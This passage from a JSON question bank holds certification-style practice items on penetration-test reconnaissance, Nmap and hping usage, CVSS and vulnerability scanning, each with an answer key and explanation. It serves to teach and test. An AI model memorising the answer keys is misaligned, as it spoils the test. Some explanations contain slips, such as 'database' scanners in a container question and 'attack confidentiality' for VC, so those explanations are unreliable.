    "topic_id": 2,
    "practice_test_id": 5,
    "related_articles": [
      16,
      67,
      70,
      62,
      61
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 46,
    "question": "Angela recovered a PNG image during the early intelligence-gathering phase of a penetration test and wants to examine it for useful metadata. What tool could she most successfully use to do this?",
    "choice_a": "ExifTool",
    "choice_b": "Grep",
    "choice_c": "PsTools",
    "choice_d": "Nginx",
    "correct_answer": "A",
    "explanation": "ExifTool is designed to pull metadata from images and other files. Grep may be useful to search for specific text in a file, but it won\u2019t pull the range of possible metadata from the file. PsTools is a Windows Sysinternals package that includes a variety of process-oriented tools. Nginx is a web server, load balancer, and multipurpose application services stack.",
    "topic_id": 2,
    "practice_test_id": 3,
    "related_articles": [
      16,
      10,
      328,
      63,
      62
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 47,
    "question": "During an Nmap scan, Casey uses the <code>-O</code> flag. The scan identifies the host as follows:<br>Running: Linux 2.6.X <br>OS CPE: cpe:/o:linux:linux_kernel:2.6 <br>OS details: Linux 2.6.9 - 2.6.33 <br>What can she determine from this information?",
    "choice_a": "The Linux distribution installed on the target",
    "choice_b": "The patch level of the installed Linux kernel",
    "choice_c": "The date the remote system was last patched",
    "choice_d": "That the system is running a Linux 2.6 kernel between .9 and .33",
    "correct_answer": "D",
    "explanation": "OS identification in Nmap is based on a variety of response attributes. In this case, Nmap\u2019s best guess is that the remote host is running a Linux 2.6.9\u20132.6.33 kernel, but it cannot be more specific. It does not specify the distribution, the patch level, or when the system was last patched.",
    "topic_id": 2,
    "practice_test_id": 3,
    "related_articles": [
      66,
      65,
      67,
      16,
      73
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 48,
    "question": "What is the full range of ports that a UDP service can run on?",
    "choice_a": "1\u20131024",
    "choice_b": "1\u201316,383",
    "choice_c": "1\u201332,767",
    "choice_d": "1\u201365,535",
    "correct_answer": "D",
    "explanation": "The full range of ports available to both TCP and UDP services is 1\u201365,535. Although port 0 exists, it is a reserved port and shouldn\u2019t be used.",
    "topic_id": 2,
    "practice_test_id": 4,
    "related_articles": [
      65,
      67,
      61,
      62,
      73
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 49,
    "question": "Steve is working from an unprivileged user account that was obtained as part of a penetration test. He has discovered that the host he is on has Nmap installed, and he wants to scan other hosts in his subnet to identify potential targets as part of a pivot attempt. What Nmap flag will Steve probably have to use to successfully scan hosts from this account?",
    "choice_a": "<code>-sV</code>",
    "choice_b": "<code>-u</code>",
    "choice_c": "<code>-oA</code>",
    "choice_d": "<code>-sT</code>",
    "correct_answer": "D",
    "explanation": "The TCP connect scan is often used when an unprivileged account is the tester\u2019s only option. Linux systems typically won\u2019t allow an unprivileged account to have direct access to create packets, but they will allow accounts to send traffic. Steve probably won\u2019t be able to use a TCP SYN scan, but a connect scan is likely to work. The other flags shown are for version testing (<code>-sV</code>) and output type selection (<code>-oA</code>), and <code>-u</code> doesn\u2019t do anything at all.",
    "topic_id": 2,
    "practice_test_id": 1,
    "related_articles": [
      65,
      16,
      62,
      53,
      73
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 50,
    "question": "Which of the following provides information about a domain\u2019s registrar and physical location?",
    "choice_a": "Nslookup",
    "choice_b": "<code>host</code>",
    "choice_c": "WHOIS",
    "choice_d": "<code>traceroute</code>",
    "correct_answer": "C",
    "explanation": "WHOIS provides information that can include the organization\u2019s physical address, registrar, contact information, and other details. Nslookup will provide IP address or hostname information, whereas the host command provides IPv4 and IPv6 addresses as well as email service information. <code>traceroute</code> attempts to identify the path to a remote host as well as the systems along the route.",
    "topic_id": 2,
    "practice_test_id": 1,
    "related_articles": [
      57,
      68,
      54,
      10,
      53
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 51,
    "question": "Chris runs an Nmap scan of the 10.10.0.0/16 network that his employer uses as an internal network range for the entire organization. If he uses the <code>-T0</code> flag, what issue is he likely to encounter?",
    "choice_a": "The scan will terminate when the host count reaches 0.",
    "choice_b": "The scan will not scan IP addresses in the .0 network.",
    "choice_c": "The scan will progress at a very slow speed.",
    "choice_d": "The scan will only scan for TCP services.",
    "correct_answer": "C",
    "explanation": "The <code>-T</code> flag in Nmap is used to set scan timing. Timing settings range from 0 (paranoid) to 5 (insane). By default, it operates at 3, or normal. With timing set to a very slow speed, Chris will run his scan for a very, very long time on a /16 network.",
    "topic_id": 2,
    "practice_test_id": 5,
    "related_articles": [
      65,
      16,
      73,
      53,
      327
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 52,
    "question": "Which of the following Nmap output formats is unlikely to be useful for a pentester?",
    "choice_a": "<code>-oA</code>",
    "choice_b": "<code>-oS</code>",
    "choice_c": "<code>-oG</code>",
    "choice_d": "<code>-oX</code>",
    "correct_answer": "B",
    "explanation": "The Script Kiddie output format that Nmap supports is entirely for fun\u2014you should never have a practical need to use the <code>-oS</code> flag for an actual penetration test.",
    "topic_id": 2,
    "practice_test_id": 5,
    "related_articles": [
      65,
      16,
      328,
      327,
      66
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 53,
    "question": "During an early phase of his penetration test, Mike recovers a binary executable file that he wants to quickly analyze for useful information. Which of the following will quickly give him a view of potentially useful information in the binary?",
    "choice_a": "Netcat",
    "choice_b": "<code>strings</code>",
    "choice_c": "Hashmod",
    "choice_d": "Eclipse",
    "correct_answer": "B",
    "explanation": "The <code>strings</code> command parses a file for strings of text and outputs them. It is often useful for analyzing binary files, since you can quickly check for information with a single quick command-line tool. Netcat, while often called a pentester\u2019s Swiss Army knife, isn\u2019t useful for this type of analysis. Eclipse is an IDE and would be useful for editing code or for managing a full decompiler in some cases.",
    "topic_id": 2,
    "practice_test_id": 4,
    "related_articles": [
      16,
      328,
      327,
      312,
      324
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 54,
    "question": "Jack is conducting a penetration test for a customer in Japan. What NIC will he most likely have to check for information about his client\u2019s networks?",
    "choice_a": "RIPE",
    "choice_b": "ARIN",
    "choice_c": "APNIC",
    "choice_d": "LACNIC",
    "correct_answer": "C",
    "explanation": "The Asia-Pacific NIC covers Asia, Australia, New Zealand, and other countries in the region. RIPE covers central Asia, Europe, the Middle East, and Russia, and ARIN covers the United States, Canada, parts of the Caribbean region, and Antarctica.",
    "topic_id": 2,
    "practice_test_id": 6,
    "related_articles": [
      57,
      10,
      53,
      68,
      72
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 55,
    "question": "Lin believes that the organization she is scanning may have load balancers in use. Which of the following techniques will help her detect them if they are DNS-based load balancers?",
    "choice_a": "Use Nmap and look for service port differences.",
    "choice_b": "Use ping and check for TTL and IP changes.",
    "choice_c": "Use Nessus and check for service version differences.",
    "choice_d": "Use WHOIS to check for multiple hostnames.",
    "correct_answer": "B",
    "explanation": "Checking for DNS load balancing via ping requires checking time to live (TTL) and IP address differences. Using Nmap or Nessus is less likely to be successful, because most devices in a pool should provide the same services and service versions. WHOIS records do not show load balancing details.",
    "topic_id": 2,
    "practice_test_id": 4,
    "related_articles": [
      61,
      68,
      56,
      62,
      60
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 56,
    "question": "Charles uses the following <code>hping</code> command to send traffic to a remote system:<br>hping remotesite.com -S -V -p 80 <br>What type of traffic will the remote system see?",
    "choice_a": "HTTP traffic to TCP port 80",
    "choice_b": "TCP SYNs to TCP port 80",
    "choice_c": "HTTPS traffic to TCP port 80",
    "choice_d": "A TCP three-way handshake to TCP port 80",
    "correct_answer": "B",
    "explanation": "Charles has issued a command that asks <code>hping</code> to send SYN traffic (<code>-S</code>) in verbose mode (<code>-V</code>) to remotesite.com on port 80.",
    "topic_id": 2,
    "practice_test_id": 4,
    "related_articles": [
      62,
      65,
      67,
      16,
      53
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 57,
    "question": "What does a result of * * * mean during a traceroute?",
    "choice_a": "No route to the host exists.",
    "choice_b": "All hosts are queried.",
    "choice_c": "There is no response to the query, perhaps a timeout, but traffic is going through.",
    "choice_d": "A firewall is blocking responses.",
    "correct_answer": "C",
    "explanation": "A series of three asterisks during a traceroute means that the host query has failed but that traffic is passing through. Many hosts are configured to not respond to this type of traffic but will route traffic properly.",
    "topic_id": 2,
    "practice_test_id": 5,
    "related_articles": [
      57,
      10,
      65,
      67,
      61
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 58,
    "question": "Rick wants to describe flaws found in an organization\u2019s internally developed web applications using a standard model. Which of the following is best suited to his need?",
    "choice_a": "CWE",
    "choice_b": "The Diamond Model",
    "choice_c": "CVE",
    "choice_d": "OWASP",
    "correct_answer": "A",
    "explanation": "The Common Weakness Enumeration is a community-developed list of hardware and software weaknesses. Although OWASP provides a massive amount of application security knowledge, it is not in and of itself a listing or standard for listing flaws. The Diamond Model is a model designed to evaluate intrusions, and CVE, the Common Vulnerabilities and Exposures database, focuses on vulnerabilities for commercial and open-source projects and thus will not typically be used for internal applications and code.",
    "topic_id": 2,
    "practice_test_id": 5,
    "related_articles": [
      73,
      16,
      70,
      10,
      67
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 59,
    "question": "Why would a pentester look for expired certificates as part of an information-gathering and enumeration exercise?",
    "choice_a": "They indicate improper encryption, allowing easy decryption of traffic.",
    "choice_b": "They indicate services that may not be properly updated or managed.",
    "choice_c": "Attackers install expired certificates to allow easy access to systems.",
    "choice_d": "Pentesters will not look for expired certificates; they only indicate procedural issues.",
    "correct_answer": "B",
    "explanation": "Pentesters are always on the lookout for indicators of improper maintenance. Lazy or inattentive administrators are more likely to make mistakes that allow pentesters in.",
    "topic_id": 2,
    "practice_test_id": 4,
    "related_articles": [
      63,
      56,
      10,
      73,
      53
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 60,
    "question": "John has gained access to a system that he wants to use to gather more information about other hosts in its local subnet. He wants to perform a port scan but cannot install other tools to do so. Which of the following tools isn\u2019t usable as a port scanner?",
    "choice_a": "Hping",
    "choice_b": "Netcat",
    "choice_c": "Telnet",
    "choice_d": "ExifTool",
    "correct_answer": "D",
    "explanation": "All of these tools except ExifTool are usable as port scanners with some clever use of command-line flags and options.",
    "topic_id": 2,
    "practice_test_id": 3,
    "related_articles": [
      16,
      65,
      62,
      327,
      10
    ],
    "source": "285006_Ch03"
  },
  {
    "id": 61,
    "question": "Ryan is conducting a penetration test and is targeting a containerized server platform. Which one of the following tools would best assist him in detecting vulnerabilities on that server?",
    "choice_a": "Nessus",
    "choice_b": "Nikto",
    "choice_c": "Trivy",
    "choice_d": "OpenVAS",
    "correct_answer": "C",
    "explanation": "Trivy is a dedicated container vulnerability scanner and is the most appropriate tool for use in this scenario. Ryan might discover the same vulnerabilities using the general-purpose Nessus or OpenVAS scanner, but they are not dedicated database vulnerability scanning tools. Nikto is a web application vulnerability scanner.",
    "topic_id": 3,
    "practice_test_id": 4,
    "related_articles": [
      84,
      86,
      255,
      89,
      119
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 62,
    "question": "Gary is conducting an unknown environment penetration test against an organization and is being provided with the results of vulnerability scans that the organization already ran for use in his tests. Which one of the following scans is most likely to provide him with helpful information within the bounds of his test?",
    "choice_a": "Stealth internal scan",
    "choice_b": "Full internal scan",
    "choice_c": "Stealth external scan",
    "choice_d": "Full external scan",
    "correct_answer": "D",
    "explanation": "A full scan is likely to provide more useful and actionable results because it includes more tests. There is no requirement in the scenario that Gary avoids detection, so a stealth scan is not necessary. However, this is an unknown environment test, so it would not be appropriate for Gary to have access to scans conducted on the internal network.",
    "topic_id": 3,
    "practice_test_id": 6,
    "related_articles": [
      80,
      103,
      13,
      82,
      94
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 63,
    "question": "What tool can known environment penetration testers use to help identify the systems present on a network prior to conducting vulnerability scans?",
    "choice_a": "Asset inventory",
    "choice_b": "Web application assessment",
    "choice_c": "Router",
    "choice_d": "DLP",
    "correct_answer": "A",
    "explanation": "An asset inventory supplements automated tools with other information to detect systems present on a network. The asset inventory provides critical information for vulnerability scans. It is appropriate to share this information with penetration testers during a known environment penetration test.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      75,
      80,
      83,
      79,
      94
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 64,
    "question": "Tonya is configuring vulnerability scans for a system that is subject to the PCI DSS compliance standard. What is the minimum frequency with which she must conduct scans?",
    "choice_a": "Daily",
    "choice_b": "Weekly",
    "choice_c": "Monthly",
    "choice_d": "Quarterly",
    "correct_answer": "D",
    "explanation": "PCI DSS requires that organizations conduct vulnerability scans on at least a quarterly basis, although many organizations choose to conduct scans on a much more frequent basis.",
    "topic_id": 3,
    "practice_test_id": 6,
    "related_articles": [
      74,
      76,
      81,
      79,
      103
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 65,
    "question": "Which one of the following is not an example of a vulnerability scanning tool?",
    "choice_a": "Qualys",
    "choice_b": "Snort",
    "choice_c": "Nessus",
    "choice_d": "OpenVAS",
    "correct_answer": "B",
    "explanation": "Qualys, Nessus, and OpenVAS are all examples of vulnerability scanning tools. Snort is an intrusion detection and prevention system.",
    "topic_id": 3,
    "practice_test_id": 1,
    "related_articles": [
      84,
      101,
      98,
      13,
      89
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 66,
    "question": "Which one of the following technologies, when used within an organization, is the <i>least</i> likely to interfere with vulnerability scanning results achieved by external penetration testers?",
    "choice_a": "Encryption",
    "choice_b": "Firewall",
    "choice_c": "Containerization",
    "choice_d": "Intrusion prevention system",
    "correct_answer": "A",
    "explanation": "Encryption technology is unlikely to have any effect on the results of vulnerability scans because it does not change the services exposed by a system. Firewalls and intrusion prevention systems may block inbound scanning traffic before it reaches target systems. Containerized and virtualized environments may prevent external scanners from seeing services exposed within the containerized or virtualized environment.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      86,
      115,
      82,
      103,
      80
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 67,
    "question": "Renee is configuring her vulnerability management solution to perform credentialed scans of servers on her network. What type of account should she provide to the scanner?",
    "choice_a": "Domain administrator",
    "choice_b": "Local administrator",
    "choice_c": "Root",
    "choice_d": "Read-only",
    "correct_answer": "D",
    "explanation": "Credentialed scans only require read-only access to target servers. Renee should follow the principle of least privilege and limit the access available to the scanner.",
    "topic_id": 3,
    "practice_test_id": 5,
    "related_articles": [
      103,
      79,
      83,
      114,
      80
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 68,
    "question": "Jason is writing a report about a potential security vulnerability in a software product and wishes to use standardized product names to ensure that other security analysts understand the report. Which SCAP component can Jason turn to for assistance?",
    "choice_a": "CVSS",
    "choice_b": "CVE",
    "choice_c": "CPE",
    "choice_d": "OVAL",
    "correct_answer": "C",
    "explanation": "Common Product Enumeration (CPE) is the SCAP component that provides standardized nomenclature for product names and versions.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      101,
      98,
      84,
      75,
      80
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 69,
    "question": "Ken is planning to conduct a vulnerability scan of an organization as part of a penetration test. He is conducting an unknown environment test. When would it be appropriate to conduct an internal scan of the network?",
    "choice_a": "During the planning stage of the test",
    "choice_b": "As soon as the contract is signed",
    "choice_c": "After receiving permission from an administrator",
    "choice_d": "After compromising an internal host",
    "correct_answer": "D",
    "explanation": "Because this is an unknown environment scan, Ken should not (and most likely cannot) conduct an internal scan until he first compromises an internal host. Once he gains this foothold on the network, he can use that compromised system as the launching point for internal scans.",
    "topic_id": 3,
    "practice_test_id": 6,
    "related_articles": [
      80,
      79,
      82,
      119,
      288
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 70,
    "question": "Which type of organization is the most likely to be impacted by a law requiring them to conduct vulnerability scans?",
    "choice_a": "University",
    "choice_b": "Hospital",
    "choice_c": "Government agency",
    "choice_d": "Doctor\u2019s office",
    "correct_answer": "C",
    "explanation": "The Federal Information Security Management Act (FISMA) requires that government agencies conduct vulnerability scans. HIPAA, which governs hospitals and doctors\u2019 offices, does not include a vulnerability scanning requirement, nor does FERPA, which covers educational institutions.",
    "topic_id": 3,
    "practice_test_id": 4,
    "related_articles": [
      74,
      79,
      76,
      116,
      80
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 71,
    "question": "Which one of the following categories of systems is most likely to be disrupted during a vulnerability scan?",
    "choice_a": "External web server",
    "choice_b": "Internal web server",
    "choice_c": "IoT device",
    "choice_d": "Firewall",
    "correct_answer": "C",
    "explanation": "Internet of Things (IoT) devices are examples of nontraditional systems that may be fragile and highly susceptible to failure during vulnerability scans. Web servers and firewalls are typically designed for exposure to wider networks and are less likely to fail during a scan.",
    "topic_id": 3,
    "practice_test_id": 4,
    "related_articles": [
      85,
      118,
      79,
      80,
      76
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 72,
    "question": "What term describes an organization\u2019s willingness to tolerate risk in their computing environment?",
    "choice_a": "Risk landscape",
    "choice_b": "Risk appetite",
    "choice_c": "Risk level",
    "choice_d": "Risk adaptation",
    "correct_answer": "B",
    "explanation": "The organization\u2019s risk appetite is its willingness to tolerate risk within the environment. If an organization is extremely risk averse, it may choose to conduct scans more frequently to minimize the amount of time between when a vulnerability comes into existence and when it is detected by a scan.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      76,
      79,
      80,
      103,
      93
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 73,
    "question": "Which one of the following factors is least likely to impact vulnerability scanning schedules?",
    "choice_a": "Regulatory requirements",
    "choice_b": "Technical constraints",
    "choice_c": "Business constraints",
    "choice_d": "Staff availability",
    "correct_answer": "D",
    "explanation": "Scan schedules are most often determined by the organization\u2019s risk appetite, regulatory requirements, technical constraints, business constraints, and licensing limitations. Most scans are automated and do not require staff availability.",
    "topic_id": 3,
    "practice_test_id": 6,
    "related_articles": [
      76,
      74,
      96,
      75,
      79
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 74,
    "question": "Adam is conducting a penetration test of an organization and is reviewing the source code of an application for vulnerabilities. What type of code testing is Adam conducting?",
    "choice_a": "Mutation testing",
    "choice_b": "Static code analysis",
    "choice_c": "Dynamic code analysis",
    "choice_d": "Fuzzing",
    "correct_answer": "B",
    "explanation": "Adam is conducting static code analysis by reviewing the source code. Dynamic code analysis requires running the program, and both mutation testing and fuzzing are types of dynamic analysis.",
    "topic_id": 3,
    "practice_test_id": 4,
    "related_articles": [
      87,
      227,
      88,
      228,
      92
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 75,
    "question": "Ryan is planning to conduct a vulnerability scan of a business-critical system using dangerous plug-ins. What would be the best approach for the initial scan?",
    "choice_a": "Run the scan against production systems to achieve the most realistic results possible.",
    "choice_b": "Run the scan during business hours.",
    "choice_c": "Run the scan in a test environment.",
    "choice_d": "Do not run the scan to avoid disrupting the business.",
    "correct_answer": "C",
    "explanation": "Ryan should first run his scan against a test environment to identify likely vulnerabilities and assess whether the scan itself might disrupt business activities.",
    "topic_id": 3,
    "practice_test_id": 7,
    "related_articles": [
      85,
      80,
      96,
      95,
      79
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 76,
    "question": "Which one of the following activities is not part of the vulnerability management life cycle?",
    "choice_a": "Detection",
    "choice_b": "Remediation",
    "choice_c": "Reporting",
    "choice_d": "Testing",
    "correct_answer": "C",
    "explanation": "While reporting and communication are an important part of vulnerability management, they are not included in the life cycle. The three life-cycle phases are detection, remediation, and testing.",
    "topic_id": 3,
    "practice_test_id": 3,
    "related_articles": [
      79,
      13,
      93,
      95,
      98
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 77,
    "question": "What approach to vulnerability scanning incorporates information from agents running on the target servers?",
    "choice_a": "Continuous monitoring",
    "choice_b": "Ongoing scanning",
    "choice_c": "On-demand scanning",
    "choice_d": "Alerting",
    "correct_answer": "A",
    "explanation": "Continuous monitoring incorporates data from agent-based approaches to vulnerability detection and reports security-related configuration changes to the vulnerability management platform as soon as they occur, providing the ability to analyze those changes for potential vulnerabilities.",
    "topic_id": 3,
    "practice_test_id": 4,
    "related_articles": [
      83,
      86,
      94,
      13,
      79
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 78,
    "question": "Brian is seeking to determine the appropriate impact categorization for a federal information system as he plans the vulnerability scanning controls for that system. After consulting management, he discovers that the system contains information that, if disclosed improperly, would have a serious adverse impact on the organization. How should this system be categorized?",
    "choice_a": "Low impact",
    "choice_b": "Moderate impact",
    "choice_c": "High impact",
    "choice_d": "Severe impact",
    "correct_answer": "B",
    "explanation": "Systems have a moderate impact from a confidentiality perspective if the unauthorized disclosure of information could be expected to have a serious adverse effect on organizational operations, organizational assets, or individuals.",
    "topic_id": 3,
    "practice_test_id": 3,
    "related_articles": [
      79,
      75,
      93,
      119,
      84
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 79,
    "question": "Jessica is reading reports from vulnerability scans run by different parts of her organization using different products. She is responsible for assigning remediation resources and is having difficulty prioritizing issues from different sources. What SCAP component can help Jessica with this task?",
    "choice_a": "CVSS",
    "choice_b": "CVE",
    "choice_c": "CPE",
    "choice_d": "XCCDF",
    "correct_answer": "A",
    "explanation": "The Common Vulnerability Scoring System (CVSS) provides a standardized approach for measuring and describing the severity of security vulnerabilities. Jessica could use this scoring system to prioritize issues raised by different source systems.",
    "topic_id": 3,
    "practice_test_id": 4,
    "related_articles": [
      99,
      119,
      93,
      98,
      106
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 80,
    "question": "Sarah is conducting a penetration test and discovers a critical vulnerability in an application. What should she do next?",
    "choice_a": "Report the vulnerability to the client\u2019s IT manager.",
    "choice_b": "Consult the SOW.",
    "choice_c": "Report the vulnerability to the developer.",
    "choice_d": "Exploit the vulnerability.",
    "correct_answer": "B",
    "explanation": "Penetration testers should always consult the statement of work (SOW) for guidance on how to handle situations where they discover critical vulnerabilities. The SOW may require reporting these issues to management immediately, or it may allow the continuation of the test exploiting the vulnerability.",
    "topic_id": 3,
    "practice_test_id": 3,
    "related_articles": [
      80,
      94,
      97,
      119,
      78
    ],
    "source": "285006_Ch04"
  },
  {
    "id": 81,
    "question": "Tom is reviewing a vulnerability scan report and finds that one of the servers on his network suffers from an internal IP address disclosure vulnerability. What protocol is likely in use on this network that resulted in this vulnerability?",
    "choice_a": "TLS",
    "choice_b": "NAT",
    "choice_c": "SSH",
    "choice_d": "VPN",
    "correct_answer": "B",
    "explanation": "Although the network can support any of these protocols, internal IP disclosure vulnerabilities occur when a network uses Network Address Translation (NAT) to map public and private IP addresses but a server inadvertently discloses its private IP address to remote systems.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      98,
      111,
      168,
      117,
      222
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 82,
    "question": "Which one of the CVSS metrics would contain information about the type of user account an attacker must use to execute an attack?",
    "choice_a": "AV",
    "choice_b": "VC",
    "choice_c": "PR",
    "choice_d": "AC",
    "correct_answer": "C",
    "explanation": "The privileges required (PR) metric describes whether the attacker needs no user privileges, normal user privileges, or administrative user privileges to conduct the attack. The other vectors described in this question are the attack vector (AV), attack complexity (AC), and attack confidentiality (VC) vectors. They would not contain information about user authentication.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      99,
      100,
      93,
      119,
      126
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 83,
    "question": "Which one of the following values for the CVSS attack complexity metric would indicate that the specified attack is simplest to exploit?",
    "choice_a": "High",
    "choice_b": "Medium",
    "choice_c": "Low",
    "choice_d": "Severe",
    "correct_answer": "C",
    "explanation": "An access complexity of \u201clow\u201d indicates that exploiting the vulnerability does not require any specialized conditions. A value of \u201chigh\u201d indicates that specialized conditions are required. High and low are the only two possible values for this metric.",
    "topic_id": 3,
    "practice_test_id": 5,
    "related_articles": [
      99,
      93,
      119,
      98,
      100
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 84,
    "question": "Which one of the following values for the confidentiality, integrity, or availability CVSS metric would indicate the potential for total compromise of a system?",
    "choice_a": "N",
    "choice_b": "A",
    "choice_c": "H",
    "choice_d": "L",
    "correct_answer": "C",
    "explanation": "If any of these measures is marked as H, for High, it indicates the potential for a complete compromise of the system.",
    "topic_id": 3,
    "practice_test_id": 7,
    "related_articles": [
      99,
      100,
      93,
      119,
      98
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 85,
    "question": "What is the most recent version of CVSS that is currently available?",
    "choice_a": "2.0",
    "choice_b": "3.0",
    "choice_c": "3.1",
    "choice_d": "4.0",
    "correct_answer": "D",
    "explanation": "Version 4.0 of CVSS is currently available and is the version described in this chapter.",
    "topic_id": 3,
    "practice_test_id": 7,
    "related_articles": [
      99,
      100,
      98,
      93,
      108
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 86,
    "question": "Which one of the following metrics is not included in the calculation of the CVSS exploitability score?",
    "choice_a": "Attack vector",
    "choice_b": "Vulnerability age",
    "choice_c": "Attack complexity",
    "choice_d": "Privileges required",
    "correct_answer": "B",
    "explanation": "The CVSS exploitability score is calculated using the attack vector, attack complexity, attack requirements, privileges required, and user interaction metrics.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      99,
      100,
      119,
      93,
      98
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 87,
    "question": "Kevin recently identified a new security vulnerability and computed its CVSS base score as 6.5. Which risk category would this vulnerability fall into?",
    "choice_a": "Low",
    "choice_b": "Medium",
    "choice_c": "High",
    "choice_d": "Critical",
    "correct_answer": "B",
    "explanation": "Vulnerabilities that have a CVSS base score between 4.0 and 6.9 fall into the Medium rating category.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      100,
      99,
      93,
      119,
      98
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 88,
    "question": "Tara recently analyzed the results of a vulnerability scan report and found that a vulnerability reported by the scanner did not exist because the system was actually patched as specified. What type of error occurred?",
    "choice_a": "False positive",
    "choice_b": "False negative",
    "choice_c": "True positive",
    "choice_d": "True negative",
    "correct_answer": "A",
    "explanation": "A false positive error occurs when the vulnerability scanner reports a vulnerability that does not actually exist.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      102,
      13,
      83,
      98,
      104
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 89,
    "question": "Which one of the following is not a common source of information that may be correlated with vulnerability scan results?",
    "choice_a": "Logs",
    "choice_b": "Database tables",
    "choice_c": "SIEM",
    "choice_d": "Configuration management system",
    "correct_answer": "B",
    "explanation": "It is unlikely that a database table would contain information relevant to assessing a vulnerability scan report. Logs, SIEM reports, and configuration management systems are much more likely to contain relevant information.",
    "topic_id": 3,
    "practice_test_id": 4,
    "related_articles": [
      106,
      98,
      105,
      13,
      94
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 90,
    "question": "Which one of the following characteristics is not required to consider a scan complete?",
    "choice_a": "All network segments have been covered.",
    "choice_b": "The scan had sufficient privileges.",
    "choice_c": "All user accounts were covered.",
    "choice_d": "All applications were covered.",
    "correct_answer": "C",
    "explanation": "There are three major requirements for a scan to be considered complete:<br>All network segments, systems, and applications within the scope have been covered and the scan configurations are appropriate for the technologies being assessed.<br>The scan has been conducted with sufficient privileges to access and evaluate the systems fully, as restricted access might lead to incomplete results, such as missing out on vulnerabilities that require authenticated checks.<br>Scans are scheduled at intervals that align with the organization\u2019s risk tolerance and the changing threat landscape, thus maintaining an up-to-date security posture.<br>These do not include coverage of all user accounts.",
    "topic_id": 3,
    "practice_test_id": 7,
    "related_articles": [
      103,
      83,
      79,
      75,
      104
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 91,
    "question": "In what type of attack does the attacker place more information in a memory location than is allocated for that use?",
    "choice_a": "SQL injection",
    "choice_b": "LDAP injection",
    "choice_c": "Cross-site scripting",
    "choice_d": "Buffer overflow",
    "correct_answer": "D",
    "explanation": "Buffer overflow attacks occur when an attacker manipulates a program into placing more data into an area of memory than is allocated for that program\u2019s use. The goal is to overwrite other information in memory with instructions that may be executed by a different process running on the system.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      110,
      88,
      92,
      114,
      107
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 92,
    "question": "You are reading a scan report about a new vulnerability that inserts more data than is allowed into a memory location. What term best describes this attack?",
    "choice_a": "Malicious code",
    "choice_b": "Privilege escalation",
    "choice_c": "Buffer overflow",
    "choice_d": "LDAP injection",
    "correct_answer": "C",
    "explanation": "Buffer overflow best describes this type of attack where more data than is allowed is inserted into a memory location, often resulting in erratic program behavior or a system crash. This technique exploits programming errors in buffer management, allowing attackers to interfere with the system. Malicious code, while potentially related, is a broader term that encompasses any code intended to cause undesired effects, security breaches, or damage to a system. Privilege escalation involves gaining elevated access to resources that are normally protected from an application or user, which is not specifically described by inserting too much data into a buffer. LDAP injection is a technique used to exploit web-based applications by manipulating LDAP statements through a web input, which is unrelated to the scenario of overflowing memory buffers.",
    "topic_id": 3,
    "practice_test_id": 5,
    "related_articles": [
      110,
      88,
      98,
      114,
      87
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 93,
    "question": "Which one of the following protocols should never be used on a public network?",
    "choice_a": "SSH",
    "choice_b": "HTTPS",
    "choice_c": "SFTP",
    "choice_d": "Telnet",
    "correct_answer": "D",
    "explanation": "Telnet is an insecure protocol that does not make use of encryption. The other protocols mentioned are all considered secure.",
    "topic_id": 3,
    "practice_test_id": null,
    "related_articles": [
      112,
      111,
      109,
      114,
      80
    ],
    "source": "285006_Ch05"
  },
  {
    "id": 94,
    "question": "Betty is selecting a transport encryption protocol for use in a new public website she is creating. Which protocol would be the best choice?",
    "choice_a": "SSL 2.0",
    "choice_b": "SSL 3.0",
    "choice_c": "TLS 1.0",
    "choice_d": "TLS 1.3",
